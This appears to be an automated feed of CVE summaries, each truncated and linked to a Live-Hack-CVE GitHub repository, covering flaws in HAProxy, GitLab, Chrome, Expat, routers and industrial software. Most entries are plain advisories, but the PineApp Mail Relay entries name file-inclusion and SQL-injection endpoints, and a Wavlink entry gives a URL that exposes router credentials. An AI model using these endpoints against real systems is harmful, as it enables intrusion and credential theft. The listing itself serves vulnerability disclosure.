**In hpack_dht_insert in hpack-tbl.c in the HPACK decoder in HAProxy 1.8 through 2.x before 2.1.4, a remote attacker can write arbitrary bytes around a certain location on the heap via a crafted HTTP/2 request, possibly causing remote code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-11100](https://github.com/Live-Hack-CVE/CVE-2020-11100) create time: 2022-12-29T08:22:14Z

**GitLab EE/CE 8.5 to 12.9 is vulnerable to a an path traversal when moving an issue between projects. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10977](https://github.com/Live-Hack-CVE/CVE-2020-10977) create time: 2022-12-29T08:22:10Z

**libEMF (aka ECMA-234 Metafile Library) through 1.0.11 allows denial of service (issue 1 of 2). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-11863](https://github.com/Live-Hack-CVE/CVE-2020-11863) create time: 2022-12-29T08:21:49Z

**Advantech WebAccess HMI Designer, Versions 2.1.9.31 and prior. A double free vulnerability caused by processing specially crafted project files may allow remote code execution, disclosure/modification of information, or cause the application to crash. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16217](https://github.com/Live-Hack-CVE/CVE-2020-16217) create time: 2022-12-29T08:21:21Z

**Advantech WebAccess HMI Designer, Versions 2.1.9.31 and prior. Processing specially crafted project files lacking proper validation of user supplied data may cause a type confusion condition, which may allow remote code execution, disclosure/modification of information, or cause the application to crash. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16229](https://github.com/Live-Hack-CVE/CVE-2020-16229) create time: 2022-12-29T08:21:18Z

**Stored XSS exists in the Appointment Booking Calendar plugin before 1.3.35 for WordPress. In the cpabc_appointments.php file, the Calendar Name input could allow attackers to inject arbitrary JavaScript or HTML. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-9371](https://github.com/Live-Hack-CVE/CVE-2020-9371) create time: 2022-12-29T08:21:14Z

**An issue was discovered in helpers/mailer.php in the Creative Contact Form extension 4.6.2 before 2019-12-03 for Joomla!. A directory traversal vulnerability resides in the filename field for uploaded attachments via the creativecontactform_upload parameter. An attacker could exploit this vulnerability with the "Send m CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-9364](https://github.com/Live-Hack-CVE/CVE-2020-9364) create time: 2022-12-29T08:21:11Z

**Use of a hard-coded cryptographic key to encrypt password data in CLI configuration in FortiManager 6.2.3 and below, FortiAnalyzer 6.2.3 and below may allow an attacker with access to the CLI configuration or the CLI backup file to decrypt the sensitive data, via knowledge of the hard-coded key. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-9289](https://github.com/Live-Hack-CVE/CVE-2020-9289) create time: 2022-12-29T08:21:07Z

**Untrusted Search Path vulnerability in the windows installer of Google Earth Pro versions prior to 7.3.3 allows an attacker to insert malicious local files to execute unauthenticated remote code on the targeted system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8895](https://github.com/Live-Hack-CVE/CVE-2020-8895) create time: 2022-12-29T08:21:04Z

**Zoho ManageEngine Password Manager Pro 10.4 and prior has no protection against Cross-site Request Forgery (CSRF) attacks, as demonstrated by changing a user's role. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-9346](https://github.com/Live-Hack-CVE/CVE-2020-9346) create time: 2022-12-29T08:21:00Z

**A carefully crafted or corrupt file may trigger a System.exit in Tika's OneNote Parser. Crafted or corrupted files can also cause out of memory errors and/or infinite loops in Tika's ICNSParser, MP3Parser, MP4Parser, SAS7BDATParser, OneNoteParser and ImageParser. Apache Tika users should upgrade to 1.24.1 or later. The CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-9489](https://github.com/Live-Hack-CVE/CVE-2020-9489) create time: 2022-12-29T08:20:57Z

**In Mahara 18.10 before 18.10.5, 19.04 before 19.04.4, and 19.10 before 19.10.2, file metadata information is disclosed to group members in the Elasticsearch result list despite them not having access to that artefact anymore. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-9386](https://github.com/Live-Hack-CVE/CVE-2020-9386) create time: 2022-12-29T08:20:40Z

**A local, arbitrary code execution vulnerability exists in the SplitCompat.install endpoint in Android's Play Core Library versions prior to 1.7.2. A malicious attacker could create an apk which targets a specific application, and if a victim were to install this apk, the attacker could perform a directory traversal, ex CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8913](https://github.com/Live-Hack-CVE/CVE-2020-8913) create time: 2022-12-29T08:20:37Z

**There is a buffer overwrite vulnerability in the Quram qmg library of Samsung's Android OS versions O(8.x), P(9.0) and Q(10.0). An unauthenticated, unauthorized attacker sending a specially crafted MMS to a vulnerable phone can trigger a heap-based buffer overflow in the Quram image codec leading to an arbitrary remote CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8899](https://github.com/Live-Hack-CVE/CVE-2020-8899) create time: 2022-12-29T08:20:33Z

**Redcarpet is a Ruby library for Markdown processing. In Redcarpet before version 3.5.1, there is an injection vulnerability which can enable a cross-site scripting attack. In affected versions no HTML escaping was being performed when processing quotes. This applies even when the `:escape_html` option was being used. T CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-26298](https://github.com/Live-Hack-CVE/CVE-2020-26298) create time: 2022-12-29T08:20:30Z

**A flaw was found in openjpeg's src/lib/openjp2/t2.c in versions prior to 2.4.0. This flaw allows an attacker to provide crafted input to openjpeg during conversion and encoding, causing an out-of-bounds write. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27844](https://github.com/Live-Hack-CVE/CVE-2020-27844) create time: 2022-12-29T08:20:26Z

**An exploitable local privilege elevation vulnerability exists in the file system permissions of the Win-911 Enterprise V4.20.13 install directory via WIN-911 Account Change Utility. Depending on the vector chosen, an attacker can overwrite various executables which could lead to escalation of the privileges when execut CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13540](https://github.com/Live-Hack-CVE/CVE-2020-13540) create time: 2022-12-29T08:20:23Z

**An exploitable local privilege elevation vulnerability exists in the file system permissions of the Mobile-911 Server V2.5 install directory. Depending on the vector chosen, an attacker can overwrite the service executable and execute arbitrary code with System privileges or replace other files within the installation CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13541](https://github.com/Live-Hack-CVE/CVE-2020-13541) create time: 2022-12-29T08:20:19Z

**libEMF (aka ECMA-234 Metafile Library) through 1.0.11 allows a use-after-free. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-11866](https://github.com/Live-Hack-CVE/CVE-2020-11866) create time: 2022-12-29T08:20:15Z

**libEMF (aka ECMA-234 Metafile Library) through 1.0.11 allows out-of-bounds memory access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-11865](https://github.com/Live-Hack-CVE/CVE-2020-11865) create time: 2022-12-29T08:20:12Z

**An improper access control flaw in all versions of GitLab CE/EE starting from 13.9 before 14.2.6, all versions starting from 14.3 before 14.3.4, and all versions starting from 14.4 before 14.4.1 exposes private email address of Issue and Merge Requests assignee to Webhook data consumers CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39911](https://github.com/Live-Hack-CVE/CVE-2021-39911) create time: 2022-12-29T08:23:28Z

**Accidental logging of system root password in the migration log in all versions of GitLab CE/EE before 14.2.6, all versions starting from 14.3 before 14.3.4, and all versions starting from 14.4 before 14.4.1 allows an attacker with local file system access to obtain system root-level privileges CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39913](https://github.com/Live-Hack-CVE/CVE-2021-39913) create time: 2022-12-29T08:23:20Z

**A memory leak flaw was found in the Linux kernel in the ccp_run_aes_gcm_cmd() function in drivers/crypto/ccp/ccp-ops.c, which allows attackers to cause a denial of service (memory consumption). This vulnerability is similar with the older CVE-2019-18808. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3744](https://github.com/Live-Hack-CVE/CVE-2021-3744) create time: 2022-12-29T08:22:59Z

**SAP Banking Services (Generic Market Data) does not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges. An unauthorized User is allowed to display restricted Business Partner Generic Market Data (GMD), due to improper authorization check. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21467](https://github.com/Live-Hack-CVE/CVE-2021-21467) create time: 2022-12-29T08:22:29Z

**An access control issue in the authentication module of wizplat PD065 v1.19 allows attackers to access sensitive data and cause a Denial of Service (DoS). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46167](https://github.com/Live-Hack-CVE/CVE-2021-46167) create time: 2022-12-29T08:18:35Z

**axios is vulnerable to Inefficient Regular Expression Complexity CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3749](https://github.com/Live-Hack-CVE/CVE-2021-3749) create time: 2022-12-29T07:46:37Z

**A race condition in Linux kernel SCTP sockets (net/sctp/socket.c) before 5.12-rc8 can lead to kernel privilege escalation from the context of a network service or an unprivileged process. If sctp_destroy_sock is called without sock_net(sk)->sctp.addr_wq_lock then an element is removed from the auto_asconf_splist list w CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23133](https://github.com/Live-Hack-CVE/CVE-2021-23133) create time: 2022-12-29T07:46:05Z

**Sipwise C5 NGCP WWW Admin version 3.6.7 up to and including platform version NGCP CE 3.0 has multiple authenticated stored and reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user: Stored XSS in callforward/time/set/save (P CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-31583](https://github.com/Live-Hack-CVE/CVE-2021-31583) create time: 2022-12-29T07:46:02Z

**A flaw was found in openstack-neutron's default Open vSwitch firewall rules. By sending carefully crafted packets, anyone in control of a server instance connected to the virtual switch can impersonate the IPv6 addresses of other systems on the network, resulting in denial of service or in some cases possibly intercept CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20267](https://github.com/Live-Hack-CVE/CVE-2021-20267) create time: 2022-12-29T07:45:41Z

**An Incomplete Comparison with Missing Factors vulnerability in the Gallagher Controller allows an attacker to bypass PIV verification. This issue affects: Gallagher Command Centre 8.40 versions prior to 8.40.1888 (MR3); 8.30 versions prior to 8.30.1359 (MR3); 8.20 versions prior to 8.20.1259 (MR5); 8.10 versions prior CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23146](https://github.com/Live-Hack-CVE/CVE-2021-23146) create time: 2022-12-29T07:45:38Z

**A flaw was found in the permissions of a log file created by kexec-tools. This flaw allows a local unprivileged user to read this file and leak kernel internal information from a previous panic. The highest threat from this vulnerability is to confidentiality. This flaw affects kexec-tools shipped by Fedora versions pr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20269](https://github.com/Live-Hack-CVE/CVE-2021-20269) create time: 2022-12-29T07:45:21Z

**SmartBear CodeCollaborator v6.1.6102 was discovered to contain a vulnerability in the web UI which would allow an attacker to conduct a clickjacking attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41657](https://github.com/Live-Hack-CVE/CVE-2021-41657) create time: 2022-12-29T07:45:18Z

**Unauthenticated users can access sensitive web URLs through GET request, which should be restricted to maintenance users only. A malicious attacker could use this sensitive information’s to launch further attacks on the system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32503](https://github.com/Live-Hack-CVE/CVE-2021-32503) create time: 2022-12-29T07:44:59Z

**Improper authentication in firmware for some Intel(R) SSD, Intel(R) Optane(TM) SSD, Intel(R) Optane(TM) SSD DC and Intel(R) SSD DC Products may allow an privileged user to potentially enable information disclosure via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33083](https://github.com/Live-Hack-CVE/CVE-2021-33083) create time: 2022-12-29T07:44:28Z

**Insufficient bounds checking in System Management Unit (SMU) may cause invalid memory accesses/updates that could result in SMU hang and subsequent failure to service any further requests from other components. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26336](https://github.com/Live-Hack-CVE/CVE-2021-26336) create time: 2022-12-29T07:43:38Z

**Sensitive information in resource not removed before reuse in firmware for some Intel(R) SSD and Intel(R) Optane(TM) SSD Products may allow an unauthenticated user to potentially enable information disclosure via physical access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33082](https://github.com/Live-Hack-CVE/CVE-2021-33082) create time: 2022-12-29T07:42:57Z

**Exposure of sensitive system information due to uncleared debug information in firmware for some Intel(R) SSD DC, Intel(R) Optane(TM) SSD and Intel(R) Optane(TM) SSD DC Products may allow an unauthenticated user to potentially enable information disclosure or escalation of privilege via physical access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33080](https://github.com/Live-Hack-CVE/CVE-2021-33080) create time: 2022-12-29T07:42:54Z

**In PHP versions 7.4.x below 7.4.28, 8.0.x below 8.0.16, and 8.1.x below 8.1.3, when using filter functions with FILTER_VALIDATE_FLOAT filter and min/max limits, if the filter fails, there is a possibility to trigger use of allocated memory after free, which can result it crashes, and potentially in overwrite of other m CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21708](https://github.com/Live-Hack-CVE/CVE-2021-21708) create time: 2022-12-29T07:42:15Z

**An out-of-bounds read flaw was found in libsndfile's FLAC codec functionality. An attacker who is able to submit a specially crafted file (via tricking a user to open or otherwise) to an application linked with libsndfile and using the FLAC codec, could trigger an out-of-bounds read that would most likely cause a crash CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4156](https://github.com/Live-Hack-CVE/CVE-2021-4156) create time: 2022-12-29T07:42:11Z

**The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based on the issuer and serial number data contained within an X509 certificate. However it fails to correctly handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is ma CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23841](https://github.com/Live-Hack-CVE/CVE-2021-23841) create time: 2022-12-29T07:39:58Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. Preview param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44396](https://github.com/Live-Hack-CVE/CVE-2021-44396) create time: 2022-12-29T07:39:51Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. GetMdState param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44418](https://github.com/Live-Hack-CVE/CVE-2021-44418) create time: 2022-12-29T07:39:47Z

**A stack overflow vulnerability exists in the httpd service in ASUS RT-AX56U Router Version 3.0.0.4.386.44266. This vulnerability is caused by the strcat function called by "caupload" input handle function allowing the user to enter 0xFFFF bytes into the stack. This vulnerability allows an attacker to execute commands r CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40556](https://github.com/Live-Hack-CVE/CVE-2021-40556) create time: 2022-12-29T07:39:18Z

**selectExpander in select.c in SQLite 3.30.1 proceeds with WITH stack unwinding even after a parsing error. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20218](https://github.com/Live-Hack-CVE/CVE-2019-20218) create time: 2022-12-29T07:39:04Z

**A maliciously crafted PDF file in Autodesk AutoCAD 2022, 2021, 2020, 2019 can be used to dereference for a write beyond the allocated buffer while parsing PDF files. The vulnerability exists because the application fails to handle a crafted PDF file, which causes an unhandled exception. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25797](https://github.com/Live-Hack-CVE/CVE-2022-25797) create time: 2022-12-29T07:38:47Z

**The software contains a hard-coded password it uses for its own inbound authentication or for outbound communication to external components on the Reason DR60 (all firmware versions prior to 02A04.1). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27440](https://github.com/Live-Hack-CVE/CVE-2021-27440) create time: 2022-12-29T07:38:44Z

**Adobe Illustrator version 25.2 (and earlier) is affected by a memory corruption vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to remote code execution in the context of the current user. Exploitation of this issue requires user interaction in that a v CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21104](https://github.com/Live-Hack-CVE/CVE-2021-21104) create time: 2022-12-29T07:38:26Z

**Adobe Illustrator version 25.2 (and earlier) is affected by a memory corruption vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve remote code execution in the context of the current user. Exploitation of this issue requires user interaction in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21105](https://github.com/Live-Hack-CVE/CVE-2021-21105) create time: 2022-12-29T07:38:23Z

**Adobe Illustrator version 25.2 (and earlier) is affected by a memory corruption vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to disclose sensitive memory information in the context of the current user. Exploitation of this issue requires user interac CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21103](https://github.com/Live-Hack-CVE/CVE-2021-21103) create time: 2022-12-29T07:38:19Z

**Adobe Bridge versions 10.1.1 (and earlier) and 11.0.1 (and earlier) are affected by a memory corruption vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue re CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21093](https://github.com/Live-Hack-CVE/CVE-2021-21093) create time: 2022-12-29T07:38:16Z

**hms-staff.php in Projectworlds Hospital Management System Mini-Project through 2018-06-17 allows SQL injection via the type parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33880](https://github.com/Live-Hack-CVE/CVE-2022-33880) create time: 2022-12-29T08:23:06Z

**DGIOT Lightweight industrial IoT v4.5.4 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35137](https://github.com/Live-Hack-CVE/CVE-2022-35137) create time: 2022-12-29T08:23:02Z

**A cross-site scripting (XSS) vulnerability in Centreon 22.04.0 allows attackers to execute arbitrary web script or HTML via a crafted payload injected into the Service>Templates service_alias parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39988](https://github.com/Live-Hack-CVE/CVE-2022-39988) create time: 2022-12-29T08:21:39Z

**Path Traversal in GitHub repository ikus060/rdiffweb prior to 2.4.10. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3389](https://github.com/Live-Hack-CVE/CVE-2022-3389) create time: 2022-12-29T08:21:35Z

**OMRON CX-Programmer 9.78 and prior is vulnerable to an Out-of-Bounds Write, which may allow an attacker to execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3396](https://github.com/Live-Hack-CVE/CVE-2022-3396) create time: 2022-12-29T08:21:32Z

**OMRON CX-Programmer 9.78 and prior is vulnerable to an Out-of-Bounds Write, which may allow an attacker to execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3398](https://github.com/Live-Hack-CVE/CVE-2022-3398) create time: 2022-12-29T08:21:28Z

**OMRON CX-Programmer 9.78 and prior is vulnerable to an Out-of-Bounds Write, which may allow an attacker to execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3397](https://github.com/Live-Hack-CVE/CVE-2022-3397) create time: 2022-12-29T08:21:25Z

**xmlparse.c in Expat (aka libexpat) before 2.4.5 allows attackers to insert namespace-separator characters into namespace URIs. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25236](https://github.com/Live-Hack-CVE/CVE-2022-25236) create time: 2022-12-29T08:19:41Z

**lrzip v0.641 was discovered to contain a multiple concurrency use-after-free between the functions zpaq_decompress_buf() and clear_rulist(). This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted Irz file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26291](https://github.com/Live-Hack-CVE/CVE-2022-26291) create time: 2022-12-29T08:19:17Z

**Remote Code Execution (RCE) in Alexander Stokmann's Code Snippets Extended plugin <= 1.4.7 on WordPress via Cross-Site Request Forgery. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29429](https://github.com/Live-Hack-CVE/CVE-2022-29429) create time: 2022-12-29T07:47:39Z

**m1k1o/blog is a lightweight self-hosted facebook-styled PHP blog. Errors from functions `imagecreatefrom*` and `image*` have not been checked properly. Although PHP issued warnings and the upload function returned `false`, the original file (that could contain a malicious payload) was kept on the disk. Users are advise CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23626](https://github.com/Live-Hack-CVE/CVE-2022-23626) create time: 2022-12-29T07:45:34Z

**A vulnerability in the Cisco Discovery Protocol service of Cisco FXOS Software and Cisco NX-OS Software could allow an unauthenticated, adjacent attacker to cause the service to restart, resulting in a denial of service (DoS) condition. This vulnerability is due to improper handling of Cisco Discovery Protocol messages CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20625](https://github.com/Live-Hack-CVE/CVE-2022-20625) create time: 2022-12-29T07:45:31Z

**Cybonet - PineApp Mail Relay Local File Inclusion. Attacker can send a request to : /manage/mailpolicymtm/log/eml_viewer/email.content.body.php?filesystem_path=ENCDODED PATH and by doing that, the attacker can read Local Files inside the server. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22793](https://github.com/Live-Hack-CVE/CVE-2022-22793) create time: 2022-12-29T07:45:28Z

**Cybonet - PineApp Mail Relay Unauthenticated Sql Injection. Attacker can send a request to: /manage/emailrichment/userlist.php?CUSTOMER_ID_INNER=1 /admin/emailrichment/userlist.php?CUSTOMER_ID_INNER=1 /manage/emailrichment/usersunlist.php?CUSTOMER_ID_INNER=1 /admin/emailrichment/usersunlist.php?CUSTOMER_ID_INNER=1 and CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22794](https://github.com/Live-Hack-CVE/CVE-2022-22794) create time: 2022-12-29T07:45:24Z

**Combodo iTop is a web based IT Service Management tool. In versions prior to 2.7.6 and 3.0.0, users of the iTop user portal can send TWIG code to the server by forging specific http queries, and execute arbitrary code on the server using http server user privileges. This issue is fixed in versions 2.7.6 and 3.0.0. Ther CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-24780](https://github.com/Live-Hack-CVE/CVE-2022-24780) create time: 2022-12-29T07:44:56Z

**In spring framework versions prior to 5.3.20+ , 5.2.22+ and old unsupported versions, applications that handle file uploads are vulnerable to DoS attack if they rely on data binding to set a MultipartFile or javax.servlet.Part to a field in a model object. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22970](https://github.com/Live-Hack-CVE/CVE-2022-22970) create time: 2022-12-29T07:44:25Z

**In Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in Version 2.8.3 the Sentilo Proxy server was discovered to contain a SQL injection vulnerability allowing an attacker to query other tables of the Sentilo service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28815](https://github.com/Live-Hack-CVE/CVE-2022-28815) create time: 2022-12-29T07:44:21Z

**In Zutty before 0.13, DECRQSS in text written to the terminal can achieve arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41138](https://github.com/Live-Hack-CVE/CVE-2022-41138) create time: 2022-12-29T07:44:15Z

**The Web Server component of TIBCO Software Inc.'s TIBCO EBX Add-ons contains an easily exploitable vulnerability that allows a low privileged attacker with network access to execute Stored Cross Site Scripting (XSS) on the affected system. A successful attack using this vulnerability requires human interaction from a p CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30578](https://github.com/Live-Hack-CVE/CVE-2022-30578) create time: 2022-12-29T07:44:02Z

**Integer overflow in matroskademux element in gst_matroska_demux_add_wvpk_header function which allows a heap overwrite while parsing matroska files. Potential for arbitrary code execution through heap overwrite. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1920](https://github.com/Live-Hack-CVE/CVE-2022-1920) create time: 2022-12-29T07:42:51Z

**DOS / potential heap overwrite in qtdemux using zlib decompression. Integer overflow in qtdemux element in qtdemux_inflate function which causes a segfault, or could cause a heap overwrite, depending on libc and OS. Depending on the libc used, and the underlying OS capabilities, it could be just a segfault or a heap ov CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2122](https://github.com/Live-Hack-CVE/CVE-2022-2122) create time: 2022-12-29T07:42:47Z

**An access control issue in Wavlink WN533A8 M33A8.V5030.190716 allows attackers to obtain usernames and passwords via view-source:http://IP_ADDRESS/sysinit.shtml?r=52300 and searching for [logincheck(user);]. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34046](https://github.com/Live-Hack-CVE/CVE-2022-34046) create time: 2022-12-29T07:42:44Z

**Heap buffer overflow in WebGL in Google Chrome prior to 103.0.5060.53 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2415](https://github.com/Live-Hack-CVE/CVE-2022-2415) create time: 2022-12-29T07:42:40Z

**Incomplete cleanup in a firmware subsystem for Intel(R) SPS before versions SPS_E3_04.08.04.330.0 and SPS_E3_04.01.04.530.0 may allow a privileged user to potentially enable denial of service via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26074](https://github.com/Live-Hack-CVE/CVE-2022-26074) create time: 2022-12-29T07:42:33Z

**An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filen CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1271](https://github.com/Live-Hack-CVE/CVE-2022-1271) create time: 2022-12-29T07:42:25Z

**In Expat (aka libexpat) before 2.4.5, an attacker can trigger stack exhaustion in build_model via a large nesting depth in the DTD element. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25313](https://github.com/Live-Hack-CVE/CVE-2022-25313) create time: 2022-12-29T07:42:18Z

**Seyeon Tech Co., Ltd FlexWATCH FW3170-PS-E Network Video System 4.23-3000_GY allows attackers to access sensitive information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25584](https://github.com/Live-Hack-CVE/CVE-2022-25584) create time: 2022-12-29T07:42:07Z

**Zoho ManageEngine SupportCenter Plus before 11020 allows Stored XSS in the request history. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25373](https://github.com/Live-Hack-CVE/CVE-2022-25373) create time: 2022-12-29T07:42:04Z

**Windows Kerberos Remote Code Execution Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-24545](https://github.com/Live-Hack-CVE/CVE-2022-24545) create time: 2022-12-29T07:41:46Z

**xmltok_impl.c in Expat (aka libexpat) before 2.4.5 lacks certain validation of encoding, such as checks for whether a UTF-8 character is valid in a certain context. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25235](https://github.com/Live-Hack-CVE/CVE-2022-25235) create time: 2022-12-29T07:41:35Z

**In Puma before versions 3.12.2 and 4.3.1, a poorly-behaved client could use keepalive requests to monopolize Puma's reactor and create a denial of service attack. If more keepalive connections to Puma are opened than there are threads available, additional connections will wait permanently if the attacker sends request CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16770](https://github.com/Live-Hack-CVE/CVE-2019-16770) create time: 2022-12-29T07:02:52Z

**DaviewIndy 8.98.7 and earlier versions have a Integer overflow vulnerability, triggered when the user opens a malformed PDF file that is mishandled by Daview.exe. Attackers could exploit this and arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9139](https://github.com/Live-Hack-CVE/CVE-2019-9139) create time: 2022-12-29T07:02:48Z

**Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Concurrency). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to comp CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2964](https://github.com/Live-Hack-CVE/CVE-2019-2964) create time: 2022-12-29T07:02:12Z

**Integer overflow in PDFium in Google Chrome prior to 74.0.3729.108 allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5820](https://github.com/Live-Hack-CVE/CVE-2019-5820) create time: 2022-12-29T06:58:27Z

**Use-after-garbage-collection in Blink in Google Chrome prior to 73.0.3683.75 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5787](https://github.com/Live-Hack-CVE/CVE-2019-5787) create time: 2022-12-29T06:58:23Z

**An integer overflow that leads to a use-after-free in WebMIDI in Google Chrome on Windows prior to 73.0.3683.75 allowed a remote attacker who had compromised the renderer process to execute arbitrary code via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5789](https://github.com/Live-Hack-CVE/CVE-2019-5789) create time: 2022-12-29T06:58:16Z

**Inappropriate optimization in V8 in Google Chrome prior to 73.0.3683.75 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5791](https://github.com/Live-Hack-CVE/CVE-2019-5791) create time: 2022-12-29T06:58:13Z

